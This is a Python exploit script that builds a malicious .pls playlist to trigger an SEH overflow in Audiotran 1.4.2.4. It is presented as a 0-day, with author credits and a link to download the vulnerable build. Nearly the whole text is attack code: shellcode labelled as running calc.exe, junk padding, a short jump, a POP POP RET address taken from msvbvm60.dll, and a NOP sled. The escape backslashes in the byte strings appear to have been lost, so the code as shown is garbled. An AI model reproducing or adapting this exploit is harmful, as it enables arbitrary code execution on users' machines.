#Audiotran 1.4.2.4 SEH Overflow Exploit 0 day
#Author Abhishek Lyall - abhilyall[at]gmail[dot]com, info[at]aslitsecurity[dot]com
#Web - http://www.aslitsecurity.com/
#Blog - http://www.aslitsecurity.blogspot.com/
#Download Vulnerable application from http://www.e-soft.co.uk/Audiotran.htm
#Vulnerable version Audiotran 1.4.2.4
#Tested on XP SP2 
#Greets Villy, Puneet Jain, Abhishek Sahni and ASL IT SECURITY TEAM
#!/usr/bin/python
#To load the playlist file in audiotran copy the ASL.pls 
#file in C:Program FilesAudiotran and click on 
#load playlist and doubleclick on ASL.pls

filename = "ASL.pls"

#windows/exec - CMD=calc.exe
shellcode = (
b"xDBxDFxD9x74x24xF4x58x2BxC9xB1x33xBA"
b"x4CxA8x75x76x83xC0x04x31x50x13x03x1CxBBx97x83x60"
b"x53xDEx6Cx98xA4x81xE5x7Dx95x93x92xF6x84x23xD0x5A"
b"x25xCFxB4x4ExBExBDx10x61x77x0Bx47x4Cx88xBDx47x02"
b"x4AxDFx3Bx58x9Fx3Fx05x93xD2x3Ex42xC9x1Dx12x1Bx86"
b"x8Cx83x28xDAx0CxA5xFEx51x2CxDDx7BxA5xD9x57x85xF5"
b"x72xE3xCDxEDxF9xABxEDx0Cx2DxA8xD2x47x5Ax1BxA0x56"
b"x8Ax55x49x69xF2x3Ax74x46xFFx43xB0x60xE0x31xCAx93"
b"x9Dx41x09xEEx79xC7x8Cx48x09x7Fx75x69xDExE6xFEx65"
b"xABx6Dx58x69x2AxA1xD2x95xA7x44x35x1CxF3x62x91x45"
b"xA7x0Bx80x23x06x33xD2x8BxF7x91x98x39xE3xA0xC2x57"
b"xF2x21x79x1ExF4x39x82x30x9Dx08x09xDFxDAx94xD8xA4"
b"x05x77xC9xD0xADx2Ex98x59xB0xD0x76x9DxCDx52x73x5D"
b"x2Ax4AxF6x58x76xCCxEAx10xE7xB9x0Cx87x08xE8x6Ex46"
b"x9Bx70x5FxEDx1Bx12x9F"
)

head = "x5Bx70x6Cx61x79x6Cx69x73x74x5Dx0Dx0Ax46x69x6Cx65x31x3D"

junk = "x41" * 1940
nseh = "xebx06x90x90"  # Short Jump
seh = "xcbx75x52x73"   # POP POP RET 0x735275CB msvbvm60.dll
nop = "x90" * 12          # NOP Sled
padd = "x90" *(5000-len(junk+nseh+seh+nop+shellcode))

textfile = open(filename , 'w')
textfile.write(head+junk+nseh+seh+nop+shellcode+padd)
textfile.close()